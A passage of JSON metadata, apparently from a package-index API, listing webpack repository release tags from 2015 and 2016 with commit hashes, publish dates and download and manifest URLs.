tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosys